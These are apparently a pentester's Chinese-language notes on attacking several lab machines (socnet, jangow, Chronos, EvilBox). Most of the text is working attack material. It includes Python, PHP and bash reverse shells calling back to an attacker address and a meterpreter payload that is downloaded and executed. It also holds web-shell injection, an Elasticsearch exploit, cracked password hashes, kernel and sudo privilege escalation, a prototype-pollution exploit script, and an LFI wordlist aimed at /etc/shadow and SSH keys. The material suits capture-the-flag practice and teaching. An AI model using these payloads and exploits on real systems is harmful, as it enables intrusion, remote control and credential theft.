0x00————————————

0x00———–靶机————–

0x00————————————

Good：

1	python -c 'import pty;pty.spawn("/bin/bash")'

1	<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f\|/bin/sh -i 2>&1\|nc 192.168.56.102 443 >/tmp/f');?>

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.102",7779));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

靶机: medium_socnet

https://www.cnblogs.com/shadow-/p/16815020.html

python反弹shell：

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.102",7779));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

msf连接：

1	msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.56.102 lport=7778 -f elf -o /var/www/html/mshell.elf

1	service apache2 start

1
2
3

wget http://192.168.56.102:80/mshell.elf
chmod 777 mshell.elf 
chmod +x mshell.elf

msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.56.102
set lport 7778
run

内网扫描：

> shell
> ip a

run autoroute -s 172.17.0.0/16
run autoroute -p
background

use auxiliary/server/socks_proxy
set VERSION 5
set SRVHOST 192.168.56.102
show options
run

1
2
3

touch proxychains.conf
sudo cat /etc/proxychains4.conf > ./proxychains.conf
vim ./proxychains.conf   #socks5 192.168.56.102 1080

1	proxychains4 -f ./proxychains.conf nmap -Pn -sT 172.17.0.0/24

1 2	sessions -1 arp -a

msf6 auxiliary(server/socks_proxy) > sessions -1
[*] Starting interaction with 1...

meterpreter > ip a
[-] Unknown command: ip
meterpreter > arp -a

ARP cache
=========

    IP address  MAC address        Interface
    ----------  -----------        ---------
    172.17.0.1  02:42:fb:53:61:32
    172.17.0.3  02:42:ac:11:00:03

1	proxychains4 -f ./proxychains.conf nmap -Pn -sT 172.17.0.1

[proxychains] Dynamic chain  ...  192.168.56.102:1080  ...  172.17.0.1:3324 <--socket error or timeout!
[proxychains] Dynamic chain  ...  192.168.56.102:1080  ...  172.17.0.1:1009 <--socket error or timeout!
[proxychains] Dynamic chain  ...  192.168.56.102:1080  ...  172.17.0.1:9595 <--socket error or timeout!
[proxychains] Dynamic chain  ...  192.168.56.102:1080  ...  172.17.0.1:9485 <--socket error or timeout!
[proxychains] Dynamic chain  ...  192.168.56.102:1080  ...  172.17.0.1:617 <--socket error or timeout!
Nmap scan report for 172.17.0.1 (172.17.0.1)
Host is up (0.0040s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
5000/tcp open  upnp

Nmap done: 1 IP address (1 host up) scanned in 4.80 seconds

1	proxychains4 -f ./proxychains.conf nmap -Pn -sT -sV 172.17.0.3

[proxychains] Dynamic chain  ...  192.168.56.102:1080  ...  172.17.0.3:9200 <--socket error or timeout!
[proxychains] Dynamic chain  ...  192.168.56.102:1080  ...  172.17.0.3:9200 <--socket error or timeout!
[proxychains] Dynamic chain  ...  192.168.56.102:1080  ...  172.17.0.3:9200  ...  OK
Nmap scan report for 172.17.0.3 (172.17.0.3)
Host is up (0.10s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
9200/tcp open  http    Elasticsearch REST API 1.4.2 (name: Tyrant; cluster: elasticsearch; Lucene 4.10.2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 141.92 seconds

1	searchsploit Elasticse

sudo apt-get install python2    # 安装 python2
wget https://bootstrap.pypa.io/pip/2.7/get-pip.py && python2 get-pip.py     # 安装 python2 的 pip2 如果有就跳过此步
python2 -m pip install requests     # 安装 requests 包
proxychains4 -f ./proxychains.conf python2 /usr/share/exploitdb/exploits/linux/remote/36337.py 172.17.0.3  # 利用 36337.py 脚本

1 2	ls cat passwords

~$ cat passwords
[proxychains] Dynamic chain  ...  192.168.56.102:1080  ...  172.17.0.3:9200  ...  OK
Format: number,number,number,number,lowercase,lowercase,lowercase,lowercase
Example: 1234abcd
john:3f8184a7343664553fcb5337a3138814 
test:861f194e9d6118f3d942a72be3e51749
admin:670c3bbc209a18dde5446e5e6c1f1d5b
root:b3d34352fc26117979deabdf1b9b6354
jane:5c158b60ed97c723b673529b8a3cf72b

1	https://md5.cn/

john:1337hack;
test:1234test;
admin:1111pass;
root:1234pass;
jane:1234jane

1	ssh -p 22 john@192.168.56.103

1 2	id uname -a

1	searchsploit Linux 3.13.0

cat /usr/share/exploitdb/exploits/linux/local/37292.c
cd /home/kali/Desktop/
cat /usr/share/exploitdb/exploits/linux/local/37292.c > ./37292.c
vim ./37292.c
gcc -o ./exp ./37292.c
cp /usr/share/metasploit-framework/data/exploits/CVE-2015-1328/ofs-lib.so ./ofs-lib.so
python -m http.server 8081

1	wget http://192.168.56.102:8081/exp && wget http://192.168.56.102:8081/ofs-lib.so

1	chmod +x ./exp && chmod +x ./ofs-lib.so && cp ./ofs-lib.so /tmp/ofs-lib.so

1	ldd --version

john@socnet:~$ ldd --version
ldd (Ubuntu EGLIBC 2.19-0ubuntu6) 2.19
Copyright (C) 2014 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.

1
2
3

john@socnet:~$ uname -a
Linux socnet 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

靶机: jangow 01

ifconfig
sudo su
arp-scan -l -I eth0
nmap 192.168.56.118

1 2	http://192.168.56.118/site/busque.php?buscar=id http://192.168.56.118/site/busque.php?buscar=echo '<?php eval($_POST["pass"]);' > 666.php

1	http://192.168.56.118/site/busque.php?buscar=echo '<?php eval($_POST[1]);' > shell.php

php反弹shell

1	<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f\|/bin/sh -i 2>&1\|nc 192.168.56.102 443 >/tmp/f');?>

python 交互式shell

1	python3 -c 'import pty;pty.spawn("/bin/bash")'

1
2
3

whoami
uname -a #系统版本
lsb_release -a #系统发行版本

1	searchsploit ubuntu 16.04

1	searchsploit -m 45010.c

1	gcc --static 45010.c -o exp2

靶机: Chronos

https://www.cnblogs.com/shadow-/p/16828146.html

1
2
3

ifconfig
arp-scan -l -I eth0
namp 192.168.56.104

┌──(root㉿kali)-[/home/kali]
└─# nmap 192.168.56.104    
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-10 00:33 EDT
Nmap scan report for 192.168.56.104 (192.168.56.104)
Host is up (0.00021s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8000/tcp open  http-alt
MAC Address: 08:00:27:F8:EE:F0 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds

┌──(root㉿kali)-[/home/kali]
└─# nmap -sV 192.168.56.104
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-10 00:36 EDT
Nmap scan report for 192.168.56.104 (192.168.56.104)
Host is up (0.00017s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
8000/tcp open  http    Node.js Express framework
MAC Address: 08:00:27:F8:EE:F0 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.89 seconds

1	http://192.168.56.104:8000/date?format=4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL

1	User-Agent: Chronos

命令注入

1 2	&& ls #5Jdixo4 &&ls #yZSGA

1	http://192.168.56.104:8000/date?format=yZSGA

1	User-Agent: Chronos

1	&& ls -lh /bin

1	F2SaSe3T3SZy3G4RcHK

1	http://192.168.56.104:8000/date?format=F2SaSe3T3SZy3G4RcHK

Mon Jul 10 05:29:12 UTC 2023
total 15M
-rwxr-xr-x 1 root root 1.1M Jun  6  2019 bash
-rwxr-xr-x 1 root root 700K Mar 12  2018 btrfs
lrwxrwxrwx 1 root root    5 Mar 12  2018 btrfsck -> btrfs
-rwxr-xr-x 1 root root 368K Mar 12  2018 btrfs-debug-tree
-rwxr-xr-x 1 root root 364K Mar 12  2018 btrfs-find-root
-rwxr-xr-x 1 root root 388K Mar 12  2018 btrfs-image
-rwxr-xr-x 1 root root 368K Mar 12  2018 btrfs-map-logical
-rwxr-xr-x 1 root root 364K Mar 12  2018 btrfs-select-super
-rwxr-xr-x 1 root root 368K Mar 12  2018 btrfstune
-rwxr-xr-x 1 root root 364K Mar 12  2018 btrfs-zero-log
-rwxr-xr-x 3 root root  35K Jul  4  2019 bunzip2
-rwxr-xr-x 1 root root 2.0M Sep 18  2020 busybox
-rwxr-xr-x 3 root root  35K Jul  4  2019 bzcat
lrwxrwxrwx 1 root root    6 Jul  4  2019 bzcmp -> bzdiff
-rwxr-xr-x 1 root root 2.1K Jul  4  2019 bzdiff
lrwxrwxrwx 1 root root    6 Jul  4  2019 bzegrep -> bzgrep
-rwxr-xr-x 1 root root 4.8K Jul  4  2019 bzexe
lrwxrwxrwx 1 root root    6 Jul  4  2019 bzfgrep -> bzgrep
-rwxr-xr-x 1 root root 3.6K Jul  4  2019 bzgrep
-rwxr-xr-x 3 root root  35K Jul  4  2019 bzip2
-rwxr-xr-x 1 root root  14K Jul  4  2019 bzip2recover
lrwxrwxrwx 1 root root    6 Jul  4  2019 bzless -> bzmore
-rwxr-xr-x 1 root root 1.3K Jul  4  2019 bzmore
-rwxr-xr-x 1 root root  35K Jan 18  2018 cat
-rwxr-xr-x 1 root root  14K Apr 21  2017 chacl
-rwxr-xr-x 1 root root  63K Jan 18  2018 chgrp
-rwxr-xr-x 1 root root  59K Jan 18  2018 chmod
-rwxr-xr-x 1 root root  67K Jan 18  2018 chown
-rwxr-xr-x 1 root root  11K Jan 22  2018 chvt
-rwxr-xr-x 1 root root 139K Jan 18  2018 cp
-rwxr-xr-x 1 root root 154K Nov  5  2019 cpio
-rwxr-xr-x 1 root root 119K Jan 25  2018 dash
-rwxr-xr-x 1 root root  99K Jan 18  2018 date
-rwxr-xr-x 1 root root  75K Jan 18  2018 dd
-rwxr-xr-x 1 root root  83K Jan 18  2018 df
-rwxr-xr-x 1 root root 131K Jan 18  2018 dir
-rwxr-xr-x 1 root root  71K Sep 16  2020 dmesg
lrwxrwxrwx 1 root root    8 Jan 31  2018 dnsdomainname -> hostname
lrwxrwxrwx 1 root root    8 Jan 31  2018 domainname -> hostname
-rwxr-xr-x 1 root root 167K Jan 22  2018 dumpkeys
-rwxr-xr-x 1 root root  35K Jan 18  2018 echo
-rwxr-xr-x 1 root root  51K Apr 26  2016 ed
-rwxr-xr-x 1 root root   28 Sep 18  2019 egrep
-rwxr-xr-x 1 root root  31K Jan 18  2018 false
-rwxr-xr-x 1 root root  11K Jan 22  2018 fgconsole
-rwxr-xr-x 1 root root   28 Sep 18  2019 fgrep
-rwxr-xr-x 1 root root  64K Sep 16  2020 findmnt
-rwxr-xr-x 1 root root 1.2K Mar 12  2018 fsck.btrfs
-rwxr-xr-x 1 root root  36K Dec 11  2018 fuser
-rwsr-xr-x 1 root root  31K Aug 11  2016 fusermount
-rwxr-xr-x 1 root root  23K Apr 21  2017 getfacl
-rwxr-xr-x 1 root root 215K Sep 18  2019 grep
-rwxr-xr-x 2 root root 2.3K Jun 24  2021 gunzip
-rwxr-xr-x 1 root root 5.8K Jun 24  2021 gzexe
-rwxr-xr-x 1 root root 100K Jun 24  2021 gzip
-rwxr-xr-x 1 root root  19K Jan 31  2018 hostname
-rwxr-xr-x 1 root root 546K Jan 26  2021 ip
-rwxr-xr-x 1 root root  63K Jul 21  2021 journalctl
-rwxr-xr-x 1 root root  11K Jan 22  2018 kbd_mode
-rwxr-xr-x 1 root root  27K Aug  9  2019 kill
-rwxr-xr-x 1 root root 147K Jul 28  2020 kmod
-rwxr-xr-x 1 root root 167K Dec  1  2017 less
-rwxr-xr-x 1 root root  11K Dec  1  2017 lessecho
lrwxrwxrwx 1 root root    8 Dec  1  2017 lessfile -> lesspipe
-rwxr-xr-x 1 root root  20K Dec  1  2017 lesskey
-rwxr-xr-x 1 root root 8.4K Dec  1  2017 lesspipe
-rwxr-xr-x 1 root root  67K Jan 18  2018 ln
-rwxr-xr-x 1 root root 207K Jan 22  2018 loadkeys
-rwxr-xr-x 1 root root  52K Mar 22  2019 login
-rwxr-xr-x 1 root root  51K Jul 21  2021 loginctl
-rwxr-xr-x 1 root root 107K Mar 21  2019 lowntfs-3g
-rwxr-xr-x 1 root root 131K Jan 18  2018 ls
-rwxr-xr-x 1 root root  83K Sep 16  2020 lsblk
lrwxrwxrwx 1 root root    4 Jul 28  2020 lsmod -> kmod
-rwxr-xr-x 1 root root  79K Jan 18  2018 mkdir
-rwxr-xr-x 1 root root 388K Mar 12  2018 mkfs.btrfs
-rwxr-xr-x 1 root root  67K Jan 18  2018 mknod
-rwxr-xr-x 1 root root  43K Jan 18  2018 mktemp
-rwxr-xr-x 1 root root  39K Sep 16  2020 more
-rwsr-xr-x 1 root root  43K Sep 16  2020 mount
-rwxr-xr-x 1 root root  15K Sep 16  2020 mountpoint
lrwxrwxrwx 1 root root   20 Jul 25  2018 mt -> /etc/alternatives/mt
-rwxr-xr-x 1 root root  79K Nov  5  2019 mt-gnu
-rwxr-xr-x 1 root root 135K Jan 18  2018 mv
-rwxr-xr-x 1 root root 241K Mar  6  2018 nano
lrwxrwxrwx 1 root root   20 Jul 25  2018 nc -> /etc/alternatives/nc
-rwxr-xr-x 1 root root  35K May 14  2018 nc.openbsd
lrwxrwxrwx 1 root root   24 Jul 25  2018 netcat -> /etc/alternatives/netcat
-rwxr-xr-x 1 root root 151K Jan 10  2017 netstat
-rwxr-xr-x 1 root root  43K Jul 21  2021 networkctl
lrwxrwxrwx 1 root root    8 Jan 31  2018 nisdomainname -> hostname
-rwxr-xr-x 1 root root 143K Mar 21  2019 ntfs-3g
-rwxr-xr-x 1 root root  11K Mar 21  2019 ntfs-3g.probe
-rwxr-xr-x 1 root root  27K Mar 21  2019 ntfscat
-rwxr-xr-x 1 root root  35K Mar 21  2019 ntfscluster
-rwxr-xr-x 1 root root  35K Mar 21  2019 ntfscmp
-rwxr-xr-x 1 root root  35K Mar 21  2019 ntfsfallocate
-rwxr-xr-x 1 root root  43K Mar 21  2019 ntfsfix
-rwxr-xr-x 1 root root  55K Mar 21  2019 ntfsinfo
-rwxr-xr-x 1 root root  32K Mar 21  2019 ntfsls
-rwxr-xr-x 1 root root  31K Mar 21  2019 ntfsmove
-rwxr-xr-x 1 root root 115K Mar 21  2019 ntfsrecover
-rwxr-xr-x 1 root root  87K Mar 21  2019 ntfssecaudit
-rwxr-xr-x 1 root root  39K Mar 21  2019 ntfstruncate
-rwxr-xr-x 1 root root  31K Mar 21  2019 ntfsusermap
-rwxr-xr-x 1 root root  47K Mar 21  2019 ntfswipe
lrwxrwxrwx 1 root root    6 Jan 22  2018 open -> openvt
-rwxr-xr-x 1 root root  19K Jan 22  2018 openvt
lrwxrwxrwx 1 root root   14 Nov  1  2017 pidof -> /sbin/killall5
-rwsr-xr-x 1 root root  63K Jun 28  2019 ping
lrwxrwxrwx 1 root root    4 Jun 28  2019 ping4 -> ping
lrwxrwxrwx 1 root root    4 Jun 28  2019 ping6 -> ping
-rwxr-xr-x 1 root root  38K Apr  4  2019 plymouth
-rwxr-xr-x 1 root root 131K Aug  9  2019 ps
-rwxr-xr-x 1 root root  35K Jan 18  2018 pwd
lrwxrwxrwx 1 root root    4 Jun  6  2019 rbash -> bash
-rwxr-xr-x 1 root root  43K Jan 18  2018 readlink
-rwxr-xr-x 1 root root   89 Apr 26  2016 red
-rwxr-xr-x 1 root root  63K Jan 18  2018 rm
-rwxr-xr-x 1 root root  43K Jan 18  2018 rmdir
lrwxrwxrwx 1 root root    4 Mar  6  2018 rnano -> nano
-rwxr-xr-x 1 root root  19K Dec 30  2017 run-parts
-rwxr-xr-x 1 root root 107K Jan 30  2018 sed
-rwxr-xr-x 1 root root  35K Apr 21  2017 setfacl
-rwxr-xr-x 1 root root  43K Jan 22  2018 setfont
-rwxr-xr-x 1 root root  39K Apr 23  2019 setupcon
lrwxrwxrwx 1 root root    4 Jul 25  2018 sh -> dash
lrwxrwxrwx 1 root root    4 Jan 25  2018 sh.distrib -> dash
-rwxr-xr-x 1 root root  35K Jan 18  2018 sleep
-rwxr-xr-x 1 root root 137K Jan 26  2021 ss
lrwxrwxrwx 1 root root    7 Sep 18  2020 static-sh -> busybox
-rwxr-xr-x 1 root root  75K Jan 18  2018 stty
-rwsr-xr-x 1 root root  44K Mar 22  2019 su
-rwxr-xr-x 1 root root  35K Jan 18  2018 sync
-rwxr-xr-x 1 root root 179K Jul 21  2021 systemctl
lrwxrwxrwx 1 root root   20 Jul 21  2021 systemd -> /lib/systemd/systemd
-rwxr-xr-x 1 root root  11K Jul 21  2021 systemd-ask-password
-rwxr-xr-x 1 root root  15K Jul 21  2021 systemd-escape
-rwxr-xr-x 1 root root  83K Jul 21  2021 systemd-hwdb
-rwxr-xr-x 1 root root  15K Jul 21  2021 systemd-inhibit
-rwxr-xr-x 1 root root  19K Jul 21  2021 systemd-machine-id-setup
-rwxr-xr-x 1 root root  15K Jul 21  2021 systemd-notify
-rwxr-xr-x 1 root root  43K Jul 21  2021 systemd-sysusers
-rwxr-xr-x 1 root root  71K Jul 21  2021 systemd-tmpfiles
-rwxr-xr-x 1 root root  27K Jul 21  2021 systemd-tty-ask-password-agent
-rwxr-xr-x 1 root root 414K Dec 16  2020 tar
-rwxr-xr-x 1 root root 9.9K Dec 30  2017 tempfile
-rwxr-xr-x 1 root root  87K Jan 18  2018 touch
-rwxr-xr-x 1 root root  31K Jan 18  2018 true
-rwxr-xr-x 1 root root 571K Jul 21  2021 udevadm
-rwxr-xr-x 1 root root  14K Aug 11  2016 ulockmgr_server
-rwsr-xr-x 1 root root  27K Sep 16  2020 umount
-rwxr-xr-x 1 root root  35K Jan 18  2018 uname
-rwxr-xr-x 2 root root 2.3K Jun 24  2021 uncompress
-rwxr-xr-x 1 root root 2.7K Jan 22  2018 unicode_start
-rwxr-xr-x 1 root root 131K Jan 18  2018 vdir
-rwxr-xr-x 1 root root  31K Sep 16  2020 wdctl
-rwxr-xr-x 1 root root  946 Dec 30  2017 which
-rwxr-xr-x 1 root root  27K Jan 12  2018 whiptail
lrwxrwxrwx 1 root root    8 Jan 31  2018 ypdomainname -> hostname
-rwxr-xr-x 1 root root 1.9K Jun 24  2021 zcat
-rwxr-xr-x 1 root root 1.8K Jun 24  2021 zcmp
-rwxr-xr-x 1 root root 5.7K Jun 24  2021 zdiff
-rwxr-xr-x 1 root root  140 Jun 24  2021 zegrep
-rwxr-xr-x 1 root root  140 Jun 24  2021 zfgrep
-rwxr-xr-x 1 root root 2.1K Jun 24  2021 zforce
-rwxr-xr-x 1 root root 5.8K Jun 24  2021 zgrep
-rwxr-xr-x 1 root root 2.0K Jun 24  2021 zless
-rwxr-xr-x 1 root root 1.9K Jun 24  2021 zmore
-rwxr-xr-x 1 root root 5.0K Jun 24  2021 znew

1
2
3

&& touch a.sh
&& echo 'bash -i >& /dev/tcp/192.168.56.102/7779 0>&1' > ./a.sh
&& bash ./a.sh

F2SaUcu11quzvQKEJBT

B2K4FCAU1SDpFs1S5Lz6BZeyhpypkmQyyYfeZ3717VL7rKXQ59JFUhUZnxUsfycU3axZP25hRoQq5mibLkoRhy

F2SaQ9Dykw37PPsvZhq

拿到反弹的shell

1
2
3

id
uname -a
cd /home && ls

1 2	cd /opt/chronos ls -alh

www-data@chronos:/opt/chronos$ ls -alh
ls -alh
total 60K
drwxr-xr-x  3 www-data www-data 4.0K Jul 10 05:33 .
drwxr-xr-x  4 root     root     4.0K Jul 30  2021 ..
-rw-r--r--  1 www-data www-data 1.4K Aug  3  2021 app.js
-rw-r--r--  1 www-data www-data   45 Jul 10 05:39 a.sh
drwxr-xr-x 56 www-data www-data 4.0K Jul 30  2021 node_modules
-rw-r--r--  1 www-data www-data   97 Jul 30  2021 package.json
-rw-r--r--  1 www-data www-data  33K Jul 30  2021 package-lock.json

www-data@chronos:/opt/chronos$ cat package.json
cat package.json
{
  "dependencies": {
    "bs58": "^4.0.1",
    "cors": "^2.8.5",
    "express": "^4.17.1"
  }
}

bs58 眼熟吗？想到前面的 base58 加密了吗？对于它想提升权限帮助不大
cors 模块解析作用主要用来解决客户端请求与服务端的跨域问题，对于它想提升权限帮助不大
express 相较于原生的http模块做了较好的扩展工作，让开发者可以高效地进行服务器业务开发，对于有用漏洞就应该存在于此

 
// created by alienum for Penetration Testing
const express = require('express');
const { exec } = require("child_process");
const bs58 = require('bs58');
const app = express();
 
const port = 8000;
 
const cors = require('cors');
 
 
app.use(cors());
 
app.get('/', (req,res) =>{
  
    res.sendFile("/var/www/html/index.html");
});
 
app.get('/date', (req, res) => {
 
    var agent = req.headers['user-agent'];
    var cmd = 'date ';                        // 开始构建命令语句
    const format = req.query.format;
    const bytes = bs58.decode(format);
    var decoded = bytes.toString();
    var concat = cmd.concat(decoded);
    if (agent === 'Chronos') {
        if (concat.includes('id') || concat.includes('whoami') || concat.includes('python') || concat.includes('nc') || concat.includes('bash') || concat.includes('php') || concat.includes('which') || concat.includes('socat')) {
 
            res.send("Something went wrong");
        }
 
        // 执行命令，利用关键
        exec(concat, (error, stdout, stderr) => {
            if (error) {
                console.log(`error: ${error.message}`);
                return;
            }
            if (stderr) {
                console.log(`stderr: ${stderr}`);
                return;
            }
            res.send(stdout);
        });
    }
    else{
 
        res.send("Permission Denied");
    }
})
 
app.listen(port,() => {
 
    console.log(`Server running at ${port}`);
 
})

cd .. 
ls -alh 
cd chronos-v2 
cd backend 
cat server.js

const express = require('express');
const fileupload = require("express-fileupload");
const http = require('http')

const app = express();

app.use(fileupload({ parseNested: true }));

app.set('view engine', 'ejs');
app.set('views', "/opt/chronos-v2/frontend/pages");

app.get('/', (req, res) => {
   res.render('index')
});

const server = http.Server(app);
const addr = "127.0.0.1"
const port = 8080;
server.listen(port, addr, () => {
   console.log('Server listening on ' + addr + ' port ' + port);
});

package.json 指明了服务端运作文件是 server.js 涉及三个模块
- ejs 模块是嵌入式 JavaScript 模板引擎
- express 与之前相同
- express-fileupload 模块 express 框架下使用的中间件，用于文件上传
server.js 显示运行时监听的是靶机的本地 127.0.0.1 8080 端口

exp

import requests

cmd = 'bash -c "bash -i &> /dev/tcp/192.168.56.102/7778 0>&1"'

# pollute
requests.post('http://127.0.0.1:8080', files = {'__proto__.outputFunctionName': (
    None, f"x;console.log(1);process.mainModule.require('child_process').exec('{cmd}');x")})

# execute command
requests.get('http://127.0.0.1:8080')

1
2
3

touch exp3.py
vim exp3.py
python3 -m http.server 8080

1	nc -lvvp 7778

1
2
3

cd /tmp
wget http://192.168.56.102:8080/exp3.py
python3 exp3.py

1
2
3

imera@chronos:~$ cat user.txt
cat user.txt
byBjaHJvbm9zIHBlcm5hZWkgZmlsZSBtb3UK

为了提升到root权限 Linux下提权有三种方式

1、内核漏洞 2、利用suid权限配置不当 3、利用sudo权限不谨慎的地方

sudo -l

imera@chronos:~$ sudo -l
sudo -l
Matching Defaults entries for imera on chronos:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User imera may run the following commands on chronos:
    (ALL) NOPASSWD: /usr/local/bin/npm *
    (ALL) NOPASSWD: /usr/local/bin/node *

node代码提权

1	sudo node -e 'child_process.spawn("/bin/bash",{stdio:[0,1,2]})'

python交互式shell

1	python3 -c 'import pty;pty.spawn("/bin/bash")'

1
2
3

root@chronos:/root# cat root.txt
cat root.txt
YXBvcHNlIHNpb3BpIG1hemV1b3VtZSBvbmVpcmEK

靶机: EvilBox—One

https://www.cnblogs.com/shadow-/p/16878609.html

https://www.cnblogs.com/upfine/p/16929756.html

1
2
3

arp-scan -l -I eth0
nmap -sV 192.168.56.105
dirsearch -u "http://192.168.56.105/" -x 403

[01:16:29] Starting: 
[01:16:47] 200 -   10KB - /index.html                               
[01:16:54] 200 -   12B  - /robots.txt                               
[01:16:54] 301 -  317B  - /secret  -> http://192.168.56.105/secret/ 
[01:16:54] 200 -    4B  - /secret/ 
Task Completed

seclists

gobuster

https://github.com/danielmiessler/SecLists

1	gobuster dir --url='192.168.56.105:80/secret' -w /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -x txt,php,html,jsp

┌──(root㉿kali)-[/usr/share]
└─# gobuster dir --url='192.168.56.105:80/secret' -w /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -x txt,php,html,jsp
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.105:80/secret
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              txt,php,html,jsp
[+] Timeout:                 10s
===============================================================
2023/07/13 02:55:43 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 4]
/evil.php             (Status: 200) [Size: 0]
Progress: 707006 / 708545 (99.78%)
===============================================================
2023/07/13 02:57:40 Finished
===============================================================

ffuf

0
1
a
'
"
(
[
{
<
,
;
?
`
/
\
%
ture
false
../robots.txt
H4x0r

1	ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:params -w ./var.txt:var -u http://192.168.56.105/secret/evil.php?params=var -fs 0

[Status: 200, Size: 12, Words: 2, Lines: 2, Duration: 21ms]
    * params: command
    * var: ../robots.txt

1	http://192.168.56.105/secret/evil.php?command=../robots.txt

curl "http://192.168.56.105/secret/evil.php?command=php://filter/read=convert.base64-encode/resource=../robots.txt"

curl "http://192.168.56.105/secret/evil.php?command=php://filter/read=convert.base64-encode/resource=./evil.php" -m 1 -s | base64 --decode

<?php
    $filename = $_GET['command'];
    include($filename);
?>

linux路径字典 file.txt

/apache/apache/conf/httpd.conf
/apache/apache2/conf/httpd.conf
/apache/php/php.ini
/bin/php.ini
/etc/anacrontab
/etc/apache/apache.conf
/etc/apache/httpd.conf
/etc/apache2/apache.conf
/etc/apache2/httpd.conf
/etc/apache2/sites-available/default
/etc/apache2/vhosts.d/00_default_vhost.conf
/etc/at.allow
/etc/at.deny
/etc/cron.allow
/etc/cron.deny
/etc/crontab
/etc/fstab
/etc/host.conf
/etc/httpd/conf.d/httpd.conf
/etc/httpd/conf.d/php.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/htdocs/index.html
/etc/httpd/htdocs/index.php
/etc/httpd/logs/access.log
/etc/httpd/logs/access_log
/etc/httpd/logs/error.log
/etc/httpd/logs/error_log
/etc/httpd/php.ini
/etc/init.d/httpd
/etc/init.d/mysql
/etc/ld.so.conf
/etc/motd
/etc/my.cnf
/etc/mysql/my.cnf
/etc/mysql/my.cnf
/etc/network/interfaces
/etc/networks
/etc/passwd
/etc/php.ini
/etc/php/apache/php.ini
/etc/php/apache2/php.ini
/etc/php/cgi/php.ini
/etc/php/php.ini
/etc/php/php4/php.ini
/etc/php4.4/fcgi/php.ini
/etc/php4/apache/php.ini
/etc/php4/apache2/php.ini
/etc/php4/cgi/php.ini
/etc/php5/apache/php.ini
/etc/php5/apache2/php.ini
/etc/php5/cgi/php.ini
/etc/phpmyadmin/config.inc.php
/etc/resolv.conf
/etc/shadow
/etc/ssh/sshd_config
/etc/ssh/ssh_config
/etc/ssh/ssh_host_dsa_key
/etc/ssh/ssh_host_dsa_key
/etc/ssh/ssh_host_dsa_key.pub
/etc/ssh/ssh_host_dsa_key.pub
/etc/ssh/ssh_host_key
/etc/ssh/ssh_host_key
/etc/ssh/ssh_host_key.pub
/etc/ssh/ssh_host_key.pub
/etc/ssh/ssh_host_rsa_key
/etc/ssh/ssh_host_rsa_key
/etc/ssh/ssh_host_rsa_key.pub
/etc/ssh/ssh_host_rsa_key.pub
/etc/sysconfig/network
/etc/sysconfig/network
/home/apache/conf/httpd.conf
/home/apache2/conf/httpd.conf
/home/bin/stable/apache/php.ini
/home2/bin/stable/apache/php.ini
/NetServer/bin/stable/apache/php.ini
/opt/www/conf/httpd.conf
/opt/www/htdocs/index.html
/opt/www/htdocs/index.php
/opt/xampp/etc/php.ini
/PHP/php.ini
/php/php.ini
/php4/php.ini
/php5/php.ini
/root/.atftp_history
/root/.bashrc
/root/.bash_history
/root/.mysql_history
/root/.nano_history
/root/.php_history
/root/.profile
/root/.ssh/authorized_keys
/root/.ssh/identity
/root/.ssh/identity.pub
/root/.ssh/id_dsa
/root/.ssh/id_dsa.pub
/root/.ssh/id_rsa
/root/.ssh/id_rsa.pub
/root/anaconda-ks.cfg
/tmp/apache/htdocs/index.html
/tmp/apache/htdocs/index.php
/usr/lib/php.ini
/usr/lib/php/php.ini
/usr/local/apache/conf/httpd.conf
/usr/local/apache/conf/php.ini
/usr/local/apache/htdocs/index.html
/usr/local/apache/htdocs/index.php
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access_log
